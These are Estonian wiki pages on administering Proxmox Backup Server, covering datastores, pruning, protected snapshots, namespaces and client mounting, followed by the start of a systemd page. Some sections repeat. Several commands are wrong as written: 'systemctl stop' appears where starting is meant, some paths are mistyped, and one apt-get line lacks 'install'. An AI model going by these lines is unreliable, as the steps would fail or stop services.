PBS tarkvara kasutamisel tuleb tegeleda kümnekonna objektiga (ressursside nimetamised, kasutajate nimetamised jms) ning asjakorraldust lihtsustab kui nende nimetamine on läbimõeldud. Järgnevas on esitatud üks võimalus

* selguse mõttes on erinevat tüüpi objektide nimesid alustatud tüübile viitava prefixiga (nt 'user-')

pbs 1st arvuti kasutajate nimekirjas on eemalt sisse pöörduvate kasutajate kirjeldused. Need kasutajad võiks nimetada nt nende pöördumise kohtade alusel, nt

* user-pve-tartu
* user-pve-tallinn

pbs 2nd arvutis võiks namespace'id nimeteada samuti pöördumiskohtade järgi, st varundatavate pve klastrite järgi

* ns-tartu
* ns-tallinn

eeldades, et kõik varundatavad asjad satuvad samasse datastore'i siis võib olla pbs arvutite datastore võiks nimetada mingi tehnoloogilise erinevus alusel, nt

* ds-ssd
* ds-hdd

datastorele vastav kataloog pbs arvutis, nt

* /srv/pbs-ssd
* /srv/pbs-hdd
* /srv/pbs-zfs

2nd pbs arvutis kirjeldatakse ära remote, st 1st pbs arvuti kust juba varundatud asju kopeeritakse. Üks 2nd pbs arvuti saab kopeerida mitmest 1st arvutist endale kokku andmeid (soovitavalt erinevatesse namespace'idesse). Sõna 'remote' kasutatakse siin natuke vastuoluliselt, eks. Nimetada võiks selle järgi kust kopeeritakse, nt

* rmt-pbs-tartu-1st
* rmt-pbs-tallinn-1st

PBS tüüpi storage nimetamine PVE Datacenter -> Storage osakonnas dialoogi lahtri 'ID' väärtuse mõttes. Võiks viidata pbs arvuti nimele ja rollile (kas 1st või 2nd), nt (sid nagu 'storage id')

* sid-pbs-narva-1st
* sid-pbs-parnu-2nd

PVE arvutite nimetamine

* pve-tartu-01, pve-tartu-02
* pve-tallinn-01, pve-tallinn-02

PBS arvutite nimetamine

* pbs-narva-1st
* pbs-parnu-2nd

===Jõudluse hindamine - benchmark===

PVE ja PBS vahelise kontakti jõudluse hindamiseks sobib kasutada proxmox-backup-client programmi 'benchmark' osakonna funktsionaalsust

<pre>
root@pve-moraal-x570:~# proxmox-backup-client benchmark --repository pm60-trt@pbs@192.168.10.197:ds-ssd
Password for "pm60-trt@pbs": ****************
fingerprint: 64:3b:cb:fb:94:c3:c9:da:92:b9:02:68:36:2c:49:b8:12:87:09:66:98:f7:b8:ad:89:9b:cd:94:c4:bc:0f:c9
Are you sure you want to continue connecting? (y/n): y
fingerprint: 64:3b:cb:fb:94:c3:c9:da:92:b9:02:68:36:2c:49:b8:12:87:09:66:98:f7:b8:ad:89:9b:cd:94:c4:bc:0f:c9
Are you sure you want to continue connecting? (y/n): y
Uploaded 610 chunks in 5 seconds.
Time per request: 8268 microseconds.
TLS speed: 507.24 MB/s
SHA256 speed: 2308.48 MB/s
Compression speed: 645.59 MB/s
Decompress speed: 759.50 MB/s
AES256/GCM speed: 1673.09 MB/s
Verify speed: 568.91 MB/s
┌───────────────────────────────────┬─────────────────────┐
│ Name │ Value │
╞═══════════════════════════════════╪═════════════════════╡
│ TLS (maximal backup upload speed) │ 507.24 MB/s (41%) │
├───────────────────────────────────┼─────────────────────┤
│ SHA256 checksum computation speed │ 2308.48 MB/s (114%) │
├───────────────────────────────────┼─────────────────────┤
│ ZStd level 1 compression speed │ 645.59 MB/s (86%) │
├───────────────────────────────────┼─────────────────────┤
│ ZStd level 1 decompression speed │ 759.50 MB/s (63%) │
├───────────────────────────────────┼─────────────────────┤
│ Chunk verification speed │ 568.91 MB/s (75%) │
├───────────────────────────────────┼─────────────────────┤
│ AES256 GCM encryption speed │ 1673.09 MB/s (46%) │
└───────────────────────────────────┴─────────────────────┘
</pre>

===2026 kevad märkused===

====PBS v. 3 - v. 4 uuendus====

Väited

* Debian v. 12 -> v. 13
* zfs v. x -> y

Enne uuendust võiks küsida

<pre>
# pbs3to4 --full
</pre>

====Kasulikud lisamaterjalid====

* https://pbs.proxmox.com/wiki/Upgrade_from_3_to_4

===Kasulikud lisamaterjalid===

* https://pve.proxmox.com/wiki/Backup_and_Restore
* https://git.proxmox.com/?p=pve-qemu.git;a=blob_plain;f=backup.txt

Proxmox Backup Server

2026-05-02T12:22:09Z

Imre: /* Kasulikud lisamaterjalid */

===Sissejuhatus===

TODO

===Mõisted===

* PBS - Proxmox Backup Server
* PVE - Proxmox Virtualization Environment
* DS - datastore
* NS - namespace
* GC - garbage collect
* Purne -

===Tööpõhimõte===

Väited

* PBS vaikimisi pakib, st ei ole mõtet kasutada PBS storage juures pakkivat failisüsteemi vms (nt 'zfs create -o compression=lz4 ...' vms; tundub, et failisüstteemi pakkimise kasutmine ei muuda varundamiseks kuluvat aega ega mahtu, aga pbs serverile tekib natuke rohkem cpu koormust)
* PBS tegleb ise pakkimisega ja paistab, et seda ei saagi välja lülitada (nt proxmox pve webgui haldusliideses backup käivitamise on 'Compression: ZSTD (fast and good)' greyed-out
* mitu PSB serverit saab omavahel nö kokku aheldada, tulemusena tekib mitme etapiline varundus (varundus varundab varundust)

Kasutusalad

* varundatud ja riknenud arvuti asendamine varundusest taastatud arvutiga
* varundatud arvuti taastamine teisse proxmox klastrisse (nt kontrolli või uuringu eesmärgil)

Üks võimalik kasutusjuhtum

<pre>
CLTARTU

pve-tartu-1 pve-tartu-2 pve-tartu-n
__________________ __________________ __________________
| | | | | |
| vm1 (vmid=1001) | | vm3 (vmid=1003) | | vm5 (vmid=1005) |
| vm2 (vmid=1002) | | vm4 (vmid=1004) | | vm6 (vmid=1006) |
|__________________| |__________________| |__________________|
| | |
| | |
-----------|-----------------|------|---------------------|--|-----------
| |
| | |
| _______|_______ ________|________
| | | | |
'---------> | ns-tartu | <------- | ns-tartu |
| | | |
| pbs-tartu-1st | | pbs-tallinn-2nd |
| | | |
,---------> | ns-tallinn | <------- | ns-tallinn |
| |_______________| |_________________|
| | |
| | |
| |
----------|------------------|------|---------------------|-|---------------
| | |
| | |
________|_________ _________|________ ________|_________
| | | | | |
| vm1 (vmid=1001) | | vm3 (vmid=1003) | | vm5 (vmid=1005) |
| vm2 (vmid=1002) | | vm4 (vmid=1004) | | vm6 (vmid=1006) |
|__________________| |__________________| |__________________|

pve-tallinn-1 pve-tallinn-2 pve-tallinn-n

CLTALLINN
</pre>

kus

* pve-1, 2 ja 3 on proxmox virtual environment host arvutid
* vm1, vm2 ... vm6 on pve peal töötavad virtuaalsed arvutid
* pbs-1st on proxmox backup server abil realiseeritud esimese taseme varundus
* pbs-2nd on proxmox backup server abil realiseeritud teise taseme varundus
* pve-1 ... 3 peavad reeglina asuma samas subnetis
* pbs-1st ja 2nd ei pea asuma samas subnetis pve arvutitega ega ise üksteisega
* CLTARTU ja CLTALLINN - PVE klastrite nimed

Varundamisega seotud võrguliiklus

* andmeliikluse algamise mõttes pöörduvad nii vmN arvutid kui pbs-2nd arvuti pbs-1st arvuti poole

===Paigaldamine===

TODO

===Seadistamine===

TODO

====Datastore lisamine - pbs ja webgui====

Järgneva eelduseks on, et pbs on paigaldatud ning arvutis on üks kasutamata /dev/vdc vms plokkseade. Datastore on võimalik seadistada pbs webgui liidese abil

Administration -> Storage/Disks -> Directory -> Create: Directory

ning avanenud dialoogis täita lahtrid

* Disk - /dev/vdc
* Filesystem - ext4
* Name - ds-pbs-tmp
* Add as Datastore - linnutada

Tulemusena tekitatakse systemd mount objekt, mis monteerib failisüsteemi /mnt/datastore alamkataloogiks

<pre>
# cat /etc/systemd/system/mnt-datastore-ds\\x2dpbs\\x2dtmp.mount
[Unit]
Description=Mount datatstore 'ds-pbs-tmp' under '/mnt/datastore/ds-pbs-tmp'

[Install]
WantedBy=multi-user.target

[Mount]
Options=defaults
Type=ext4
What=/dev/disk/by-uuid/5d52fefc-212a-45dc-ab68-dc55dc3ed051
Where=/mnt/datastore/ds-pbs-tmp
</pre>

mis täpsemalt paistab nii

<pre>
# df -t ext4 -h
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/pbs-root 21G 1.8G 19G 9% /
/dev/vdc1 108G 258M 102G 1% /mnt/datastore/ds-pbs-tmp
</pre>

ning lisaks võetakse kasutusele datastore'ina

<pre>
# cat /etc/proxmox-backup/datastore.cfg
datastore: ds-pbs-tmp
path /mnt/datastore/ds-pbs-tmp
</pre>

Siin on mitu nö probleemi

* ketas partitsioneeritakse - see teeb ebamugavaks /dev/vdc suurendamise, käigult ei saagi hästi suurendada
* süsteemis osa failisüsteeme monteeritakse /etc/fstab abil ja osa systemd vahenditega
* /mnt alune on üldiselt natuke ebaloomulik koht püsivaks kasutuseks asjade pidamiseks (/mnt on ad hoc monteerimisteks, ja /srv püsivateks) - vt https://en.wikipedia.org/wiki/Filesystem_Hierarchy_Standard

====Datastore lisamine - käsitsi ja webgui====

Ehk otsekohesem ja ka suurema kontrolli tulemuse üle saab nö tavalisel viisil monteerides /etc/fstab abil /srv/pbs alla failisüsteemi ning siis webgui pealt seadistada pbs tarkvara seda kasutama.

# pvcreate /dev/vdc
# vgcreate vg_pbs /dev/vdc
# lvcreate -l +100%FREE -n srv_pbs vg_pbs
# mkfs.ext4 /devv/vg_pbs/srv_pbs
# # cat /etc/fstab
...
/dev/vg_pbs/srv_pbs /srv/pbs ext4 defaults 0 0
# mkdir /srv/pbs
# mount /srv/pbs

ext4 failisüsteemi kasutamisel kasutatakse veel nö vahel lisaks lvm kihti, see teeb võimalikud muudatused sujuvamaks, nt saab kunagi plokkseadme asendada käigult pvmove abil.

Kui /srv/pbs kataloogi alla on failisüsteem monteeritud, siis sobib webgui peal öelda

Datastore -> Add Datastore

ning täita lahtrid

* Name - ds-pbs
* Backing Path: /srv/pbs

===Kasutamine - varundamine===

TODO

Seadistatud ja varundamisega tegelevas PBS serveris on muu hulgas sellised failid

* datastore'ide kirjeldus - /etc/proxmox-backup/datastore.cfg
* proxmox kasutajatega seotud andmed - shadow.json, user.cfg ja acl.cfg
* 2nd stage kopeerimise ligipääsu kirjeldus - /etc/proxmox-backup/remote.cfg

===Kasutatamine - taastamine===

TODO

===Haldamine===

Tundub, et pbs tarkvara juhtimiseks on kaks käivitusskripti, seiskamiseks

# systemctl stop proxmox-backup-proxy
# systemctl stop proxmox-backup

käivitamiseks

# systemctl stop proxmox-backup
# systemctl stop proxmox-backup-proxy

proxmox-backup-proxy kuulab 8007 võrku, apt teenus jms

<pre>
root@varundus-2nd:/srv# netstat -lnpt | grep backup
tcp 0 0 127.0.0.1:82 0.0.0.0:* LISTEN 3461/proxmox-backup
tcp6 0 0 :::8007 :::* LISTEN 3476/proxmox-backup

root@varundus-2nd:/srv# ps aux | grep 3476
backup 3476 16.6 1.6 844856 51096 ? Ssl 21:59 0:32 /usr/lib/x86_64-linux-gnu/proxmox-backup/proxmox-backup-proxy
</pre>

Andmesalvestuse asukohtade jms seadistused asuvad failis

<pre>
root@pbs:~# cat /etc/proxmox-backup/datastore.cfg
datastore: ds_zpool_wds_pbs
comment
gc-schedule daily
path /zpool_wdc/pbs
prune-schedule daily
...
</pre>

===PBS schedule kasutamine===

Väited

* virtuaalsete arvutite regulaarsed varundamised seadistatakse Proxmox VE keskkonnas (nt proxmox hostide webgui haldusliidestes)
* varundamine toimib proxmox host algatusel
* varundatud varunduste regulaarne harvendamine toimub proxmox backup serveri webgui haldusliideses seadistatu alusel; ja pbs algatusel
* Prune - tegeleb nö kataloogist vana varunduse eemaldamisega
* GC (garbage collection) - tegeleb kataloogist kustatule vastavate andmete osa vabastamisega salvestusseadmelt

====Regulaarsete varundamiste seadistamine - PVE====

Virtuaalse arvuti regulaarse varundamise seadistamiseks sobib virtuaalse arvuti juures veenduda, et plokkseadmete juures ei ole märget

backup=0

Seejärel avada

Datacenter -> Backup -> Add (või Edit kui juba on olemas)

ning linnutada ära sobiv arvuti.

====Regulaarsete kustutamise seadistamine - PBS====

Logida sisse varundamise arvutisse ja valida

Datastore -> ds_nimi -> Prune & GC

ning seadistada Prune rutiin

* Keep Last
* Keep Hourly
* ..
* Keep Yearly

ning seadistada Prune ja CG alguse aeg.

====Protected====

Vaikimisi prunemine kustutab hiljem või varem kõik varundused ära. Kui soovitakse mõnda seisu (olgu see moodustunud automaatselt või käsitsi) säilitada lõpmatult kaua, siis sobib märkida ta Protected olekusse. Seda saab teha PVE 7.1 webgui liideses, ja PBS v. 2.1 webgui liidses

Datastore -> ds_nimi -> Content -> Group -> snapshot

* group - virtuaalne arvuti
* snapshot - konkreetsele ajale vastav varundus

Kõigi toimunud varunduste protected olekusse seadistamiseks sobib öelda

<pre>
# export PBS_PASSWORD="xxx"
# cat pbs-protected.sh
for i in `proxmox-backup-client list --repository pm60-trt@pbs@192.168.99.199:ds_zpool_wds_pbs_coff | awk {'print $2'} | grep "^vm"`; do
for j in `proxmox-backup-client snapshot list ${i} --repository pm60-trt@pbs@192.168.99.199:ds_zpool_wds_pbs_coff | awk {'print $2'} | grep ^vm`; do
proxmox-backup-client snapshot protected update ${j} true --repository pm60-trt@pbs@192.168.99.199:ds_zpool_wds_pbs_coff;
done;
done

# sh pbs-protected.sh
</pre>

Edukast tulemusest annab tunnistust varunduste Content vaates, et snaphost real on Protected pildike muutunud hallist roheliseks.

====Prune simulator====

Aadressil https://pbs.proxmox.com/docs/prune-simulator/ asub tore simulaator, mille abil illustreeritakse milliseid konkreetseid varundusi prunemine tabab.

====Märkused====

Varundamise kasutamine võib olla lihtsam ja varundus kvaliteetsem (kooskõlalisem) kui varundatavate arvutite failisüsteemid ei ole laiali määritud mitmele plokkseadmele (nt lvm volume group asub ühel virtio plokkseadmel).

====Kasulikud lisamaterjalid====

* https://pbs.proxmox.com/docs/prune-simulator/

===PVE integreeritud varunduse kasutamine proxmox-backup-client abil===

PVE integreeritud varunduse kasutamiseks on vaja

* varundatud andmeid PBS serveris
* varunduse serverile üle nn api port 8007 liidese ligipääsu
* teada datastore nime varunduse arvutis
* nö klientarvutit kuhu on paigaldatud proxmox-backup-client tarkvara (see võiks olla nö kolmas arvuti, st mitte pbs ega varundatud arvuti ise)

Varundatud arvutite nimekirja küsimine (nn group'id)

# proxmox-backup-client list --repository pm60-trt@pbs@192.168.99.199:ds_zpool_wds_pbs_coff
Password for "pm60-trt@pbs":

Varundatud arvuti varunduste nimekirja küsimine (nn snapshot'id)

<pre>
# proxmox-backup-client snapshot list vm/194 --output-format text --repository pm60-trt@pbs@192.168.99.199:ds_zpool_wds_pbs_coff
┌─────────────────────────────┬────────┬────────────────────────────────────────────────────────────────────────────┐
│ snapshot │ size │ files │
╞═════════════════════════════╪════════╪════════════════════════════════════════════════════════════════════════════╡
│ vm/194/2021-01-02T13:23:12Z │ 34 GiB │ client.log drive-virtio0.img drive-virtio1.img index.json qemu-server.conf │
├─────────────────────────────┼────────┼────────────────────────────────────────────────────────────────────────────┤
│ vm/194/2021-01-02T14:26:53Z │ 34 GiB │ client.log drive-virtio0.img drive-virtio1.img index.json qemu-server.conf │
├─────────────────────────────┼────────┼────────────────────────────────────────────────────────────────────────────┤
│ vm/194/2021-10-09T20:59:42Z │ 34 GiB │ client.log drive-virtio0.img drive-virtio1.img index.json qemu-server.conf │
└─────────────────────────────┴────────┴────────────────────────────────────────────────────────────────────────────┘
</pre>

Protection muutmine

# proxmox-backup-client snapshot protected update vm/194/2021-01-02T13:23:12Z true --repository pm60-trt@pbs@192.168.99.199:ds_zpool_wds_pbs_coff
# proxmox-backup-client snapshot protected update vm/194/2021-01-02T13:23:12Z false --repository pm60-trt@pbs@192.168.99.199:ds_zpool_wds_pbs_coff

Tõmmise kasutamine

# proxmox-backup-client map vm/106/2021-02-20T21:27:29Z drive-virtio0.img --repository pm60-trt@pbs@192.168.99.199:ds_zpool_wds_pbs_coff
# proxmox-backup-client map vm/106/2021-02-20T21:27:29Z drive-virtio1.img --repository pm60-trt@pbs@192.168.99.199:ds_zpool_wds_pbs_coff
# proxmox-backup-client map vm/106/2021-02-20T21:27:29Z drive-virtio2.img --repository pm60-trt@pbs@192.168.99.199:ds_zpool_wds_pbs_coff

kui virtuaalses arvuti on moodustatud neile nt lvm, siis tuleks öelda

# vgchange -a y
# lvdisplay
# mount -o ro,norecovery /dev/sys/root /mnt/root

Seejärel saab /mnt/root alt kasutada varundatud seisu nii nagu tavalist read-only failisüsteemi. Kasutamise lõpetamiseks sobib öelda

# umount /mnt/root
# vgchange -a n
# proxmox-backup-client unmap drive-virtio0.img
# proxmox-backup-client unmap drive-virtio1.img
# proxmox-backup-client unmap drive-virtio2.img

ilma viimase argumendita esitatakse mapped ressursside nimekiri

<pre>
# proxmox-backup-client unmap
/dev/loop26: pm60-trt@pbs@192.168.99.199:8007:ds_zpool_wds_pbs_coff:vm/106/2021-02-20T21:27:29Z/drive-virtio2.img
/dev/loop25: pm60-trt@pbs@192.168.99.199:8007:ds_zpool_wds_pbs_coff:vm/106/2021-02-20T21:27:29Z/drive-virtio1.img
/dev/loop24: pm60-trt@pbs@192.168.99.199:8007:ds_zpool_wds_pbs_coff:vm/106/2021-02-20T21:27:29Z/drive-virtio0.img
</pre>

proxmox-backup-client nn kolmanda arvuti ettevalmistamine

Esmalt paigaldada Ubuntu 20.04 või Debian v. 10 või v. 11 nö tavaliselt viisil. Seejärel lisada repo võti, nt Ubuntu 20.04 puhul

# wget http://download.proxmox.com/debian/proxmox-ve-release-6.x.gpg -O /etc/apt/trusted.gpg.d/proxmox-ve-release-6.x.gpg

Moodustada source fail

# cat /etc/apt/sources.list.d/pbs-client.list
deb [arch=amd64] http://download.proxmox.com/debian/pbs-client buster main

Paigaldada tarkvara

# apt-get update
# apt-get proxmox-backup-client

===Namespace kasutamine===

TODO

<pre>
root@tmp-pbs:~# proxmox-backup-client namespace list --repository root@pam@tmp-pbs.sise.moraal.ee:ds_tmp_tmp
Password for "root@pam": ************
root@tmp-pbs:~# proxmox-backup-client namespace create tere --repository root@pam@tmp-pbs.sise.moraal.ee:ds_tmp_tmp
root@tmp-pbs:~# proxmox-backup-client namespace list --repository root@pam@tmp-pbs.sise.moraal.ee:ds_tmp_tmp
tere
</pre>

===Misc===

PBS töötamise käigus kasutatakse katalooge selliselt

<pre>
# ls -ld /srv/pbs-rmt/* /srv/pbs-rmt/ns/* /srv/pbs-rmt/.chunks /srv/pbs-rmt/ns/tmp-pve-1/vm/5001/*/*
drwxr-x--- 1 backup backup 1060864 Dec 17 16:27 /srv/pbs-rmt/.chunks
drwxr-xr-x 3 backup backup 4096 Dec 17 16:33 /srv/pbs-rmt/ns
drwxr-xr-x 3 backup backup 4096 Dec 17 16:33 /srv/pbs-rmt/vm
drwxr-xr-x 3 backup backup 4096 Dec 17 16:36 /srv/pbs-rmt/ns/ns-pve-tartu
drwxr-xr-x 3 backup backup 4096 Dec 17 16:36 /srv/pbs-rmt/ns/ns-pve-tallinn
-rw-r--r-- 1 backup backup 627 Dec 17 16:36 /srv/pbs-rmt/ns/ns-pve-tallinn/vm/5001/2022-12-17T10:40:02Z/client.log.blob
-rw-r--r-- 1 backup backup 86016 Dec 17 16:36 /srv/pbs-rmt/ns/ns-pve-tallinn/vm/5001/2022-12-17T10:40:02Z/drive-virtio0.img.fidx
-rw-r--r-- 1 backup backup 422 Dec 17 16:36 /srv/pbs-rmt/ns/ns-pve-tallinn/vm/5001/2022-12-17T10:40:02Z/index.json.blob
-rw-r--r-- 1 backup backup 355 Dec 17 16:36 /srv/pbs-rmt/ns/ns-pve-tallinn/vm/5001/2022-12-17T10:40:02Z/qemu-server.conf.blob
...
</pre>

kus

* /srv/pbs-rmt/ns/ns-pve-tartu - konkreetsele namespace'ile vastav kataloog, tõenäoliselt varundatakse ühe namespace alla ühte pve setup'i (kas standalone proxmox või pve klaster); üks pbs võimaldab namespace instrumendi abil teenindada mitmete pve setup'ide varundamist seejuures vältides vmid väärtuste jms konflikte
* /srv/pbs-rmt/.chunks - varundatud andmed (siin toimub dedupleerimine, pakkimine jms) - seal on koos kõigi namespace'ide alla kuuluvad andmed
* /srv/pbs-rmt/ns/ns-pve-tallinn/vm/5001/2022-12-17T10:40:02Z - arvuti vmid=5001 ühele konkreetsele varunduskorrale (tavaliselt on selliseid kuupäeva + kellaaeg nimelisi kataloogi mitu) vastvad metaandmeid; selle info abil oskab pbs taastada sh leiab üles .chunks kataloogist vajalikud varundatud andmed
* /srv/pbs-rmt/vm - namespace eelse aja varunduskorra metaandmete kataloog - vastab praegu namespace nimele 'Root'

Väited

* namespace eelsel ajal liigendati mitut pve setuppi teenindava pbs serveri sees varundamisi erinevate datastore'ide moodustamise abil; namespace ajal kasutatakse pigem ühte datastore'i ning selle see liigendatakse erinevaid pve setuppisid namespace instrumendi abil
* tundub, et pbs webgui ja proxmox-backup-client utiliidile lisaks saab teatud tegevusi edukalt sooritada ka niisama ehedalt /etc/proxmox-backup-server kataloogi aluseid faile redigeerides
* tundub, et pbs serverisse moodustatud datastore'ile vastavat kataloogi (koos kogu selle sisuga) saab liigutada edukalt ühelt pbs serverilt teisele ja edasi kasutada (nt taasteks)
* tundub, et 1st ja 2nd proxmox serverisse moodustatud datastore on iseenesest täpselt samaväärne (nt saab ühe pve setup jaoks kasutusel olevat 2nd (ehk remote) pbs arvutit kasutada teise pve setup juures 1st pbs arvutina
* tundub, et pbs on väga robustne tarkvara, st tema töötamisega ei kaasne mingeid salajasi binari andmebaase vms - kõik vajalik on /etc/proxmox-backup-server kataloogis või nö /srv/pbs failisüsteemis ja seadistused on tekstifailide kujul mida saab ettevaatlikult ka käsitsi tekstiredaktoriga hallata

===Robustsed tegevused===

Sarnaselt nagu tar programmiga on võimalik töötada .tar arhiivi failiga, muu hulgas

* moodustada arhiivi
* esitada arhiivi kopeeritud failide nimekiri
* kopeerida arhiivist välja
* lisada faile arhiivi
* eemaldada faile arhiivist

on võimalik PBS tarkvaraga teha samu tegevusi, kuid natuke teisel abstraktsiooni tasemel

* seadistada pbs varunduse serverisse datastore
* kopeerida PVE keskkonnast virtuaalsete arvutite virtuaalseid plokkseadmeid datastore'i (virtuaalsele arvutile vastava komplektina)
* eemaldada PBS datastore pealt sinna kopeeritud arvuteid
* esitada datastore peale kopeeritud arvutite nimekiri
* kontrollida datastore peal olevate andmete terviklust

Väited

* kui tar puhul on tööriistaks programm 'tar', siis pbs puhul on tööriistaks debian operatsioonisüsteem ja sellesse paigaldatud pbs tarkvara
* kui tar puhul on andmeteks .tar arhiiv st üks fail (seal on nii andmed kui metaandmed), siis pbs puhul on andmeteks /srv/pbs/.chunks, /srv/pbs/ns jt kataloogid (seal on nii andmed kui metaandmed)
* kui .tar arhiivist ei ole praktiliselt mõeldav mingi konkreetse andme kätte saamine ilma tar utiliidita, siis pbs puhul on olukord sarnane
* .tar arhiiv on võimalik moodustada ühes arvutis ja kasutada teises arvutis (natuke erineva tar programmi versiooniga), pbs puhul on olukord sarnane

Tundub, et robustsete tegevuste eel on tark pbs protsessid ära lõpetada

# systemctl stop proxmox-backup proxmox-backup-proxy

ja seejärel on nt võimalik

* tekitada namespace'isid moodutades katalooge /srv/pbs/ns kataloogi alla

# mkdir /sv/pbs-tmp/ns/ns-tmp-4
# chown backup:backup /srv/pbs-tmp/ns/ns-tmp-4

* liigutada ns katalooge failisüsteemi tasemel ringi, tulemusena moodustub uus namespace ja see on ka sisustatud

# mv /sv/pbs-tmp/ns/ns-tmp-4 /sv/pbs-tmp/ns/ns-tmp-5

* TODO

Peale robustsete tegevuste lõppu pbs protsessid käivitada

# systemctl stop proxmox-backup proxmox-backup-proxy

===Objektide nimetamine===

PBS tarkvara kasutamisel tuleb tegeleda kümnekonna objektiga (ressursside nimetamised, kasutajate nimetamised jms) ning asjakorraldust lihtsustab kui nende nimetamine on läbimõeldud. Järgnevas on esitatud üks võimalus

* selguse mõttes on erinevat tüüpi objektide nimesid alustatud tüübile viitava prefixiga (nt 'user-')

pbs 1st arvuti kasutajate nimekirjas on eemalt sisse pöörduvate kasutajate kirjeldused. Need kasutajad võiks nimetada nt nende pöördumise kohtade alusel, nt

* user-pve-tartu
* user-pve-tallinn

pbs 2nd arvutis võiks namespace'id nimeteada samuti pöördumiskohtade järgi, st varundatavate pve klastrite järgi

* ns-tartu
* ns-tallinn

eeldades, et kõik varundatavad asjad satuvad samasse datastore'i siis võib olla pbs arvutite datastore võiks nimetada mingi tehnoloogilise erinevus alusel, nt

* ds-ssd
* ds-hdd

datastorele vastav kataloog pbs arvutis, nt

* /srv/pbs-ssd
* /srv/pbs-hdd
* /srv/pbs-zfs

2nd pbs arvutis kirjeldatakse ära remote, st 1st pbs arvuti kust juba varundatud asju kopeeritakse. Üks 2nd pbs arvuti saab kopeerida mitmest 1st arvutist endale kokku andmeid (soovitavalt erinevatesse namespace'idesse). Sõna 'remote' kasutatakse siin natuke vastuoluliselt, eks. Nimetada võiks selle järgi kust kopeeritakse, nt

* rmt-pbs-tartu-1st
* rmt-pbs-tallinn-1st

PBS tüüpi storage nimetamine PVE Datacenter -> Storage osakonnas dialoogi lahtri 'ID' väärtuse mõttes. Võiks viidata pbs arvuti nimele ja rollile (kas 1st või 2nd), nt (sid nagu 'storage id')

* sid-pbs-narva-1st
* sid-pbs-parnu-2nd

PVE arvutite nimetamine

* pve-tartu-01, pve-tartu-02
* pve-tallinn-01, pve-tallinn-02

PBS arvutite nimetamine

* pbs-narva-1st
* pbs-parnu-2nd

===Jõudluse hindamine - benchmark===

PVE ja PBS vahelise kontakti jõudluse hindamiseks sobib kasutada proxmox-backup-client programmi 'benchmark' osakonna funktsionaalsust

<pre>
root@pve-moraal-x570:~# proxmox-backup-client benchmark --repository pm60-trt@pbs@192.168.10.197:ds-ssd
Password for "pm60-trt@pbs": ****************
fingerprint: 64:3b:cb:fb:94:c3:c9:da:92:b9:02:68:36:2c:49:b8:12:87:09:66:98:f7:b8:ad:89:9b:cd:94:c4:bc:0f:c9
Are you sure you want to continue connecting? (y/n): y
fingerprint: 64:3b:cb:fb:94:c3:c9:da:92:b9:02:68:36:2c:49:b8:12:87:09:66:98:f7:b8:ad:89:9b:cd:94:c4:bc:0f:c9
Are you sure you want to continue connecting? (y/n): y
Uploaded 610 chunks in 5 seconds.
Time per request: 8268 microseconds.
TLS speed: 507.24 MB/s
SHA256 speed: 2308.48 MB/s
Compression speed: 645.59 MB/s
Decompress speed: 759.50 MB/s
AES256/GCM speed: 1673.09 MB/s
Verify speed: 568.91 MB/s
┌───────────────────────────────────┬─────────────────────┐
│ Name │ Value │
╞═══════════════════════════════════╪═════════════════════╡
│ TLS (maximal backup upload speed) │ 507.24 MB/s (41%) │
├───────────────────────────────────┼─────────────────────┤
│ SHA256 checksum computation speed │ 2308.48 MB/s (114%) │
├───────────────────────────────────┼─────────────────────┤
│ ZStd level 1 compression speed │ 645.59 MB/s (86%) │
├───────────────────────────────────┼─────────────────────┤
│ ZStd level 1 decompression speed │ 759.50 MB/s (63%) │
├───────────────────────────────────┼─────────────────────┤
│ Chunk verification speed │ 568.91 MB/s (75%) │
├───────────────────────────────────┼─────────────────────┤
│ AES256 GCM encryption speed │ 1673.09 MB/s (46%) │
└───────────────────────────────────┴─────────────────────┘
</pre>

===20260502 märkused===

====PBS v. 3 - v. 4 uuendus====

Väited

* Debian v. 12 -> v. 13
* zfs v. x -> y

Enne uuendust võiks küsida

====Kasulikud lisamaterjalid====

* https://pbs.proxmox.com/wiki/Upgrade_from_3_to_4

===Kasulikud lisamaterjalid===

* https://pve.proxmox.com/wiki/Backup_and_Restore
* https://git.proxmox.com/?p=pve-qemu.git;a=blob_plain;f=backup.txt

Systemd kasutamine

2026-05-02T10:12:34Z

Imre: /* Tööpõhimõte - leevendus */

===Sissejuhatus===

systemd http://freedesktop.org/wiki/Software/systemd/ ...

Tundub, et 2014 aasta lõpus on Debian v. 8 Jessie koosseisus vaikimisi systemd

# ls -ld /sbin/init
lrwxrwxrwx 1 root root 20 Sep 28 22:33 /sbin/init -> /lib/systemd/systemd

===Tööpõhimõte===

* Turvalisus ja tegevuste isoleerimine failisüsteemi ja võrgu tasemel, http://0pointer.de/blog/projects/security.html
* SysV käivitusskripti on imperatiivsed, st shell skriptid praktiliselt, systemd nö käivitusskriptid on deklaratiivsed, st nn .ini failidele sarnase sisuga

===Paigaldamine===

Tundub, et minimaalsele keskkonnale (nt debootstrap abil moodustatud) tuleb juurde lisada dbus ja polkit tugi, vastasel korral nt systemd-cgls programm ei tööta)

# apt-get install dbus libpolkit-agent-1-0

===Kasutamine===

Teenuse oleku küsimiseks sobib öelda

# systemctl status ssh.service
● ssh.service - OpenBSD Secure Shell server
Loaded: loaded (/lib/systemd/system/ssh.service; enabled)
Active: active (running) since Tue 2014-11-04 02:43:10 EET; 18h ago
Main PID: 1956 (sshd)
CGroup: /system.slice/ssh.service
└─1956 /usr/sbin/sshd -D

kus

# cat /lib/systemd/system/ssh.service
[Unit]
Description=OpenBSD Secure Shell server
After=network.target auditd.service
ConditionPathExists=!/etc/ssh/sshd_not_to_be_run

[Service]
EnvironmentFile=-/etc/default/ssh
ExecStart=/usr/sbin/sshd -D $SSHD_OPTS
ExecReload=/bin/kill -HUP $MAINPID
KillMode=process
Restart=on-failure

[Install]
WantedBy=multi-user.target
Alias=sshd.service

Teenuste nimekirja esitamiseks

# systemctl list-units --type=service | head -n 5
UNIT LOAD ACTIVE SUB DESCRIPTION
accounts-daemon.service loaded active running Accounts Service
acpid.service loaded active exited LSB: Start the Advanced Configuration and Power Interface daemon
amavis-mc.service loaded active exited LSB: Startup script for amavis master supervisor
amavis.service loaded active running LSB: Starts amavisd-new mailfilter

Tundub, et teenus saab olla mitmes olekus, üks variant teenuseid on sellised, mis arvuti käivitamisel nö korraks töötavad midagi sisse lülitades ja siis teevad exit, nt

# systemctl list-units --type=service --state=exited
UNIT LOAD ACTIVE SUB DESCRIPTION
getty-static.service loaded active exited getty on tty2-tty6 if dbus and logind are not available
kbd.service loaded active exited LSB: Prepare console
